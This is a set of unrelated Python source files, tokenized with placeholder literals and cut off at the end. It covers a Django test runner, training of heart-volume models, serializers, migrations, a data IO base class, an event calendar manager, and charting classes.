<s> import sys <EOL> from os . path import dirname , abspath <EOL> from django . conf import settings <EOL> if not settings . configured : <EOL> settings . configure ( <EOL> DATABASE_ENGINE = '<STR_LIT>' , <EOL> ROOT_URLCONF = '<STR_LIT>' , <EOL> SITE_ID = <NUM_LIT:1> , <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> from django . test . simple import run_tests <EOL> def runtests ( * test_args ) : <EOL> if not test_args : <EOL> test_args = [ '<STR_LIT>' ] <EOL> parent = dirname ( abspath ( __file__ ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , parent ) <EOL> failures = run_tests ( test_args , verbosity = <NUM_LIT:1> , interactive = True ) <EOL> sys . exit ( failures ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> runtests ( * sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import sys <EOL> sys . path . append ( '<STR_LIT:..>' ) <EOL> from SETTINGS import * ; <EOL> tag = <NUM_LIT:10> ; <EOL> fcn_img_size = <NUM_LIT> ; <EOL> net_version = <NUM_LIT:1> ; <EOL> heart_delta_multiplier = <NUM_LIT> ; <EOL> para_ss = <NUM_LIT> ; <EOL> do_cv = False ; <EOL> num_epochs = <NUM_LIT> ; <EOL> shift = <NUM_LIT:15> ; <EOL> rotation = <NUM_LIT:30> ; <EOL> scale = <NUM_LIT> ; <EOL> no_contour_type = '<STR_LIT:L>' ; </s>
<s> import pandas as pd ; <EOL> import SETTINGS as sts ; <EOL> from fitting_models import * <EOL> import analysis <EOL> def train_sex_age_model ( info , train_true ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> sa_model = SexAgeModel ( ) ; <EOL> sa_model . fit ( info , train_true ) ; <EOL> sa_predict = sa_model . predict ( info ) ; <EOL> analysis . evaluate_pred ( sa_predict , train_true ) ; <EOL> return sa_predict ; <EOL> def train_ch4_model ( ch4_data , train_true ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> ch4_model = Ch4Model ( ) ; <EOL> ch4_model . fit ( ch4_data , train_true ) ; <EOL> ch4_pred = ch4_model . predict ( ch4_data ) ; <EOL> analysis . evaluate_pred ( ch4_pred , train_true ) ; <EOL> return ch4_pred ; <EOL> def train_sax_model ( areas_all , train_true , version , cleaner = [ ] ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> sax_model = SaxModel ( version = version ) ; <EOL> result = analysis . get_preliminary_volume ( areas_all , cleaner = cleaner ) ; <EOL> sax_model . fit ( result , train_true ) ; <EOL> sax_predict = sax_model . predict ( result ) ; <EOL> analysis . evaluate_pred ( sax_predict , train_true ) ; <EOL> return sax_predict ; <EOL> def train_sax_cnt_model ( areas_all , cont_all , train_true , version = <NUM_LIT:2> , cleaner = [ ] ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> cnt_sax_model = SaxModel ( version = version ) ; <EOL> cnt_result = analysis . get_preliminary_volume_cnt ( areas_all , cont_all , cleaner = cleaner ) ; <EOL> cnt_sax_model . fit ( cnt_result , train_true ) ; <EOL> cnt_sax_predict = cnt_sax_model . predict ( cnt_result ) ; <EOL> analysis . evaluate_pred ( cnt_sax_predict , train_true ) ; <EOL> return cnt_sax_predict ; <EOL> def train_sax_cnt_filter_model ( areas_all , cont_all , train_true , cleaner = [ ] ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> cnt_result = analysis . get_preliminary_volume_cnt_filter ( areas_all , cont_all , cleaner = cleaner ) ; <EOL> cnt_sax_model = SaxFilterModel ( ) ; <EOL> cnt_sax_model . 
fit ( cnt_result , train_true ) ; <EOL> cnt_sax_predict = cnt_sax_model . predict ( cnt_result ) ; <EOL> analysis . evaluate_pred ( cnt_sax_predict , train_true ) ; <EOL> return cnt_sax_predict ; <EOL> def train_oneslice_model ( areas_all , train_true ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> oneslice_model = OneSliceModel ( ) ; <EOL> oneslice_model . fit ( areas_all , train_true ) ; <EOL> oneslice_predict = oneslice_model . predict ( areas_all ) ; <EOL> analysis . evaluate_pred ( oneslice_predict , train_true ) ; <EOL> return oneslice_predict ; <EOL> def build_default_model ( oneslice_pred , ch4_pred , sa_predict , p_1 = <NUM_LIT> ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> default_pred = { } ; <EOL> def _bdm_ave ( x1 , x2 , x0 ) : <EOL> if np . isnan ( x1 [ <NUM_LIT:0> ] ) : <EOL> return x0 if np . isnan ( x2 [ <NUM_LIT:0> ] ) else x2 ; <EOL> elif np . isnan ( x2 [ <NUM_LIT:0> ] ) : <EOL> return x1 ; <EOL> return np . asarray ( [ x1 [ <NUM_LIT:0> ] * p_1 + x2 [ <NUM_LIT:0> ] * ( <NUM_LIT:1> - p_1 ) , min ( x1 [ <NUM_LIT:1> ] , x2 [ <NUM_LIT:1> ] ) ] ) ; <EOL> for case , value in sa_predict . iteritems ( ) : <EOL> pred1 = oneslice_pred . get ( case ) ; <EOL> pred2 = ch4_pred . get ( case ) ; <EOL> if pred1 is None : <EOL> pred1 = np . zeros ( <NUM_LIT:4> ) ; <EOL> pred1 [ : ] = np . nan ; <EOL> if pred2 is None : <EOL> pred2 = np . zeros ( <NUM_LIT:4> ) ; <EOL> pred2 [ : ] = np . nan ; <EOL> x = np . zeros ( <NUM_LIT:4> ) ; <EOL> x [ <NUM_LIT:0> : <NUM_LIT:2> ] = _bdm_ave ( pred1 [ <NUM_LIT:0> : <NUM_LIT:2> ] , pred2 [ <NUM_LIT:0> : <NUM_LIT:2> ] , value [ <NUM_LIT:0> : <NUM_LIT:2> ] ) ; <EOL> x [ <NUM_LIT:2> : <NUM_LIT:4> ] = _bdm_ave ( pred1 [ <NUM_LIT:2> : <NUM_LIT:4> ] , pred2 [ <NUM_LIT:2> : <NUM_LIT:4> ] , value [ <NUM_LIT:2> : <NUM_LIT:4> ] ) ; <EOL> default_pred [ case ] = x ; <EOL> return default_pred ; <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> cleaner = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ; <EOL> info = pd . read_csv ( sts . 
output_dir + '<STR_LIT>' ) <EOL> ch4_data = { int ( r [ <NUM_LIT:0> ] ) : ( r [ <NUM_LIT:1> ] , r [ <NUM_LIT:2> ] ) for _ , r in <EOL> pd . read_csv ( sts . tencia_output_dir + '<STR_LIT>' , header = False ) . iterrows ( ) } ; <EOL> tencia_files = [ '<STR_LIT>' , '<STR_LIT>' ] ; <EOL> tencia_areas = [ analysis . get_cnn_results ( sts . tencia_output_dir + '<STR_LIT>' . format ( x ) ) for x in tencia_files ] ; <EOL> qifiles = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ; <EOL> qi_areas = [ analysis . get_cnn_results ( sts . output_dir + "<STR_LIT>" . format ( v ) ) for v in qifiles ] ; <EOL> qi_cnts = [ analysis . get_cnn_results ( sts . output_dir + "<STR_LIT>" . format ( v ) ) for v in qifiles ] ; <EOL> train_true = pd . read_csv ( sts . data_kaggle + '<STR_LIT>' ) ; <EOL> Ntrain = train_true . shape [ <NUM_LIT:0> ] ; <EOL> print ( "<STR_LIT>" . format ( Ntrain ) ) ; <EOL> filter_ll = - <NUM_LIT> ; <EOL> sa_predict = train_sex_age_model ( info , train_true ) ; <EOL> ch4_predict = train_ch4_model ( ch4_data , train_true ) ; <EOL> pick = [ <NUM_LIT:0> , <NUM_LIT:1> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:1> , filter_ll = filter_ll ) ; <EOL> oneslice_pred = train_oneslice_model ( qi_best , train_true ) ; <EOL> default_pred = build_default_model ( oneslice_pred , ch4_predict , sa_predict ) ; <EOL> analysis . evaluate_pred ( default_pred , train_true ) ; <EOL> tencia_best = analysis . take_best ( tencia_areas , method = <NUM_LIT:2> , filter_ll = - <NUM_LIT> ) ; <EOL> tencia_predict = train_sax_model ( tencia_best , train_true , version = <NUM_LIT:2> ) ; <EOL> pick = [ <NUM_LIT:0> , <NUM_LIT:1> ] ; <EOL> qi_best , qi_best_cont = analysis . 
take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:1> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> pick = [ <NUM_LIT:2> , <NUM_LIT:3> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:3> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred2 = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred2 = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred2 = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> pick = [ <NUM_LIT:4> , <NUM_LIT:5> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:1> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred3 = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred3 = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred3 = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> pick = [ <NUM_LIT:6> , <NUM_LIT:7> ] ; <EOL> qi_best , qi_best_cont = analysis . 
take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:3> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred4 = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred4 = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred4 = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> print ( "<STR_LIT>" ) ; <EOL> all_models = [ qi_sax_pred , qi_sax_pred2 , qi_sax_pred3 , qi_sax_cnt_pred , qi_sax_cnt_pred2 , qi_sax_cnt_pred3 , qi_sax_filter_pred , qi_sax_filter_pred2 , qi_sax_filter_pred3 , qi_sax_pred4 , qi_sax_cnt_pred4 , qi_sax_filter_pred4 , tencia_predict , default_pred ] ; <EOL> ave_model = AverageModel ( ll = <NUM_LIT> ) ; <EOL> ave_model . fit ( all_models , train_true ) ; <EOL> ave_model . set ( ave_model . p * <NUM_LIT> ) ; <EOL> ave_pred = ave_model . predict ( all_models ) ; <EOL> final_pred = analysis . fill_default ( ave_pred , default_pred ) ; <EOL> analysis . evaluate_pred ( final_pred , train_true ) ; <EOL> analysis . make_submit ( final_pred , <NUM_LIT> , <NUM_LIT> , "<STR_LIT:test>" ) ; <EOL> analysis . save_intermediate ( final_pred , <NUM_LIT:1> , <NUM_LIT> , "<STR_LIT:test>" ) ; </s>
<s> from . views import * <EOL> from . serializers import * <EOL> from . renderers import * </s>
<s> from wq . db . patterns . base import serializers as base <EOL> from . models import Annotation <EOL> class AnnotationSerializer ( base . TypedAttachmentSerializer ) : <EOL> class Meta ( base . TypedAttachmentSerializer . Meta ) : <EOL> model = Annotation <EOL> class AnnotatedModelSerializer ( base . AttachedModelSerializer ) : <EOL> annotations = AnnotationSerializer ( many = True ) </s>
<s> from . serializers import * </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> initial = True <EOL> dependencies = [ <EOL> ( '<STR_LIT:file>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> bases = ( '<STR_LIT>' , ) , <EOL> ) , <EOL> ] </s>
<s> from collections import MutableMapping , MutableSequence <EOL> class BaseIO ( MutableMapping , MutableSequence ) : <EOL> "<STR_LIT>" <EOL> tabular = False <EOL> nested = False <EOL> binary = False <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . __dict__ . update ( kwargs ) <EOL> self . refresh ( ) <EOL> def refresh ( self ) : <EOL> self . load ( ) <EOL> if getattr ( self , '<STR_LIT>' , False ) : <EOL> self . data = [ ] <EOL> else : <EOL> self . parse ( ) <EOL> if hasattr ( self , '<STR_LIT:file>' ) and not self . file . closed : <EOL> self . file . close ( ) <EOL> def load ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def parse ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dump ( self , file = None ) : <EOL> "<STR_LIT>" <EOL> if file is None : <EOL> file = self . file <EOL> file . write ( str ( self . data ) ) <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> self . dump ( self . file ) <EOL> field_names = None <EOL> scan_fields = False <EOL> _auto_field_names = None <EOL> def get_field_names ( self ) : <EOL> "<STR_LIT>" <EOL> if self . field_names is not None : <EOL> if isinstance ( self . field_names , str ) : <EOL> return self . field_names . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> else : <EOL> return self . field_names <EOL> if not getattr ( self , '<STR_LIT:data>' , None ) : <EOL> return None <EOL> if self . _auto_field_names : <EOL> return self . _auto_field_names <EOL> if self . scan_fields : <EOL> field_names = set ( ) <EOL> for row in self . data : <EOL> field_names . update ( row . keys ( ) ) <EOL> field_names = list ( field_names ) <EOL> else : <EOL> field_names = list ( self . data [ <NUM_LIT:0> ] . keys ( ) ) <EOL> self . _auto_field_names = field_names <EOL> return field_names <EOL> @ property <EOL> def key_field ( self ) : <EOL> "<STR_LIT>" <EOL> return None <EOL> def get_key_field ( self ) : <EOL> return self . 
key_field <EOL> def usable_item ( self , item ) : <EOL> "<STR_LIT>" <EOL> return item <EOL> def parse_usable_item ( self , uitem ) : <EOL> "<STR_LIT>" <EOL> return uitem <EOL> def compute_index ( self , recompute = False ) : <EOL> key_field = self . get_key_field ( ) <EOL> if key_field is None : <EOL> return None <EOL> if getattr ( self , '<STR_LIT>' , None ) is not None and not recompute : <EOL> return self . _index_cache <EOL> index = { } <EOL> for i , item in enumerate ( self . data ) : <EOL> uitem = self . usable_item ( item ) <EOL> if isinstance ( uitem , dict ) : <EOL> key = uitem . get ( key_field , None ) <EOL> else : <EOL> key = getattr ( uitem , key_field , None ) <EOL> if key is not None : <EOL> index [ key ] = i <EOL> self . _index_cache = index <EOL> return index <EOL> def find_index ( self , key ) : <EOL> index = self . compute_index ( ) <EOL> if index is not None : <EOL> return index . get ( key , None ) <EOL> else : <EOL> return key <EOL> def __len__ ( self ) : <EOL> return len ( self . data ) <EOL> def __getitem__ ( self , key ) : <EOL> index = self . find_index ( key ) <EOL> if index is None : <EOL> raise KeyError <EOL> return self . usable_item ( self . data [ index ] ) <EOL> def __setitem__ ( self , key , uitem ) : <EOL> item = self . parse_usable_item ( uitem ) <EOL> index = self . find_index ( key ) <EOL> if index is not None : <EOL> self . data [ index ] = item <EOL> else : <EOL> self . data . append ( item ) <EOL> self . compute_index ( True ) <EOL> def __delitem__ ( self , key ) : <EOL> index = self . find_index ( key ) <EOL> if index is None : <EOL> raise KeyError <EOL> del self . data [ index ] <EOL> self . compute_index ( True ) <EOL> def insert ( self , index , uitem ) : <EOL> item = self . parse_usable_item ( uitem ) <EOL> self . data . insert ( index , item ) <EOL> self . compute_index ( True ) <EOL> def __iter__ ( self ) : <EOL> for item in self . data : <EOL> uitem = self . 
usable_item ( item ) <EOL> if uitem is None : <EOL> return <EOL> pk = self . get_key_field ( ) <EOL> if pk is None : <EOL> yield uitem <EOL> elif isinstance ( uitem , dict ) : <EOL> yield uitem . get ( pk , None ) <EOL> else : <EOL> yield getattr ( uitem , pk , None ) <EOL> def sync ( self , other , save = True ) : <EOL> if self . get_key_field ( ) is None or other . get_key_field ( ) is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> for key in self : <EOL> other [ key ] = self [ key ] <EOL> if save : <EOL> other . save ( ) <EOL> def copy ( self , other , save = True ) : <EOL> del other . data [ : ] <EOL> for item in self . data : <EOL> uitem = self . usable_item ( item ) <EOL> other . append ( uitem ) <EOL> if save : <EOL> other . save ( ) <EOL> no_pickle = [ ] <EOL> no_pickle_loader = [ ] <EOL> no_pickle_mapper = [ ] <EOL> no_pickle_parser = [ ] <EOL> def get_no_pickle ( self ) : <EOL> return ( <EOL> self . no_pickle + <EOL> self . no_pickle_loader + <EOL> self . no_pickle_mapper + <EOL> self . no_pickle_parser <EOL> ) <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . __dict__ . copy ( ) <EOL> for name in self . get_no_pickle ( ) : <EOL> state . pop ( name , None ) <EOL> return state <EOL> def item_dict ( self , item ) : <EOL> return item <EOL> def as_dataframe ( self ) : <EOL> from pandas import DataFrame <EOL> key = self . get_key_field ( ) <EOL> if key : <EOL> data = [ self . item_dict ( row ) for row in self . values ( ) ] <EOL> else : <EOL> data = [ self . item_dict ( row ) for row in self ] <EOL> df = DataFrame ( data ) <EOL> if key : <EOL> df . set_index ( key , inplace = True ) <EOL> return df </s>
<s> from __future__ import unicode_literals <EOL> import datetime <EOL> from calendar import monthrange <EOL> from django . db import models <EOL> from django . db . models import Q <EOL> from django . utils . timezone import make_aware , get_default_timezone <EOL> class EventManager ( models . Manager ) : <EOL> def _get_kwargs ( self , category , tag ) : <EOL> """<STR_LIT>""" <EOL> vals = { <EOL> '<STR_LIT>' : category , <EOL> '<STR_LIT>' : tag <EOL> } <EOL> kwargs = { } <EOL> for k , v in vals . items ( ) : <EOL> if v : <EOL> kwargs [ k ] = v <EOL> return kwargs <EOL> @ staticmethod <EOL> def get_first_and_last ( year , month ) : <EOL> """<STR_LIT>""" <EOL> ym_first = make_aware ( <EOL> datetime . datetime ( year , month , <NUM_LIT:1> ) , <EOL> get_default_timezone ( ) <EOL> ) <EOL> ym_last = make_aware ( <EOL> datetime . datetime ( year , month , monthrange ( year , month ) [ <NUM_LIT:1> ] , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> - <NUM_LIT:1> ) , <EOL> get_default_timezone ( ) <EOL> ) <EOL> return ym_first , ym_last <EOL> def all_month_events ( self , year , month , category = None , tag = None , <EOL> loc = False , cncl = False ) : <EOL> """<STR_LIT>""" <EOL> kwargs = self . _get_kwargs ( category , tag ) <EOL> ym_first , ym_last = self . get_first_and_last ( year , month ) <EOL> pref = [ ] <EOL> if loc : <EOL> pref . append ( "<STR_LIT:location>" ) <EOL> if cncl : <EOL> pref . append ( "<STR_LIT>" ) <EOL> r = Q ( repeat = "<STR_LIT>" ) <EOL> dstart_mo = Q ( start_date__month = month ) <EOL> dend_mo = Q ( end_date__month = month ) <EOL> dstart_yr = Q ( start_date__year = year ) <EOL> dend_yr = Q ( end_date__year = year ) <EOL> return self . model . objects . filter ( <EOL> r & ( dstart_mo | dend_mo ) | <EOL> ( ~ Q ( repeat = "<STR_LIT>" ) ) | <EOL> ( ( dstart_yr | dend_yr ) & ( dstart_mo | dend_yr ) ) , <EOL> Q ( end_repeat = None ) | Q ( end_repeat__gte = ym_first ) , <EOL> start_date__lte = ym_last <EOL> ) . filter ( ** kwargs ) . 
prefetch_related ( * pref ) . order_by ( '<STR_LIT>' ) . distinct ( ) <EOL> def live ( self , now ) : <EOL> """<STR_LIT>""" <EOL> return self . model . objects . filter ( <EOL> Q ( end_repeat = None ) | Q ( end_repeat__gte = now ) | <EOL> Q ( start_date__gte = now ) | Q ( end_date__gte = now ) <EOL> ) . exclude ( <EOL> start_date__lt = now , end_date__lt = now , <EOL> repeat = "<STR_LIT>" , end_repeat = None , <EOL> ) . prefetch_related ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . core . urlresolvers import reverse <EOL> from . event_factory import create_event , SetMeUp <EOL> class MultipleEventsListViewTest ( SetMeUp ) : <EOL> """<STR_LIT>""" <EOL> def test_multi ( self ) : <EOL> event1 = create_event ( <EOL> start_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> end_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> created_by = self . user , <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> repeat = "<STR_LIT>" , <EOL> ) <EOL> event2 = create_event ( <EOL> start_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> end_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> created_by = self . user , <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> repeat = "<STR_LIT>" , <EOL> ) <EOL> event3 = create_event ( <EOL> start_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> end_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> created_by = self . user , <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> repeat = "<STR_LIT>" , <EOL> ) <EOL> events = { <EOL> event1 . title : event1 . description , <EOL> event2 . title : event2 . description , <EOL> event3 . title : event3 . description , <EOL> } <EOL> for month in ( '<STR_LIT:5>' , '<STR_LIT>' ) : <EOL> response = self . client . get ( reverse ( <EOL> '<STR_LIT>' , kwargs = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : month } <EOL> ) ) <EOL> for k , v in events . items ( ) : <EOL> self . assertContains ( response , k ) <EOL> self . assertContains ( response , v ) </s>
<s> from setuptools import setup <EOL> from os . path import abspath , dirname , join <EOL> path = abspath ( dirname ( __file__ ) ) <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> required = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> kw = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : open ( join ( path , '<STR_LIT>' ) ) . read ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : classifiers , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : required , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> setup ( ** kw ) </s>
<s> """<STR_LIT>""" <EOL> from . visualization import Visualization <EOL> from . data import Data <EOL> from . transforms import Transform <EOL> from . values import ValueRef <EOL> from . properties import PropertySet <EOL> from . scales import DataRef , Scale <EOL> from . marks import MarkProperties , MarkRef , Mark <EOL> from . axes import Axis <EOL> from . colors import brews <EOL> try : <EOL> import pandas as pd <EOL> except ImportError : <EOL> pd = None <EOL> try : <EOL> import numpy as np <EOL> except ImportError : <EOL> np = None <EOL> def data_type ( data , grouped = False , columns = None , key_on = '<STR_LIT>' , iter_idx = None ) : <EOL> '''<STR_LIT>''' <EOL> if iter_idx : <EOL> return Data . from_mult_iters ( idx = iter_idx , ** data ) <EOL> if pd : <EOL> if isinstance ( data , ( pd . Series , pd . DataFrame ) ) : <EOL> return Data . from_pandas ( data , grouped = grouped , columns = columns , <EOL> key_on = key_on ) <EOL> if isinstance ( data , ( list , tuple , dict ) ) : <EOL> return Data . from_iter ( data ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> class Chart ( Visualization ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , columns = None , key_on = '<STR_LIT>' , iter_idx = None , <EOL> width = <NUM_LIT> , height = <NUM_LIT> , grouped = False , no_data = False , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Chart , self ) . __init__ ( * args , ** kwargs ) <EOL> self . width , self . height = width , height <EOL> self . padding = "<STR_LIT>" <EOL> self . columns = columns <EOL> self . _is_datetime = False <EOL> if data is None and not no_data : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not no_data : <EOL> if isinstance ( data , ( list , tuple , dict ) ) : <EOL> if not data : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if isinstance ( data , ( pd . Series , pd . DataFrame ) ) : <EOL> if isinstance ( data . index , pd . DatetimeIndex ) : <EOL> self . _is_datetime = True <EOL> self . 
data [ '<STR_LIT>' ] = ( <EOL> data_type ( data , grouped = grouped , columns = columns , <EOL> key_on = key_on , iter_idx = iter_idx ) <EOL> ) <EOL> class Line ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Line , self ) . __init__ ( * args , ** kwargs ) <EOL> x_type = '<STR_LIT:time>' if self . _is_datetime else '<STR_LIT>' <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = x_type , range = '<STR_LIT:width>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) , <EOL> range = '<STR_LIT>' ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> from_ = MarkRef ( <EOL> data = '<STR_LIT>' , <EOL> transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) ] ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = "<STR_LIT>" ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = "<STR_LIT>" ) , <EOL> stroke = ValueRef ( scale = "<STR_LIT>" , field = '<STR_LIT>' ) , <EOL> stroke_width = ValueRef ( value = <NUM_LIT:2> ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> class Scatter ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Scatter , self ) . __init__ ( * args , ** kwargs ) <EOL> x_type = '<STR_LIT:time>' if self . _is_datetime else '<STR_LIT>' <EOL> self . 
scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = x_type , range = '<STR_LIT:width>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) , <EOL> range = '<STR_LIT>' ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> from_ = MarkRef ( <EOL> data = '<STR_LIT>' , <EOL> transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) ] ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = "<STR_LIT>" ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = "<STR_LIT>" ) , <EOL> size = 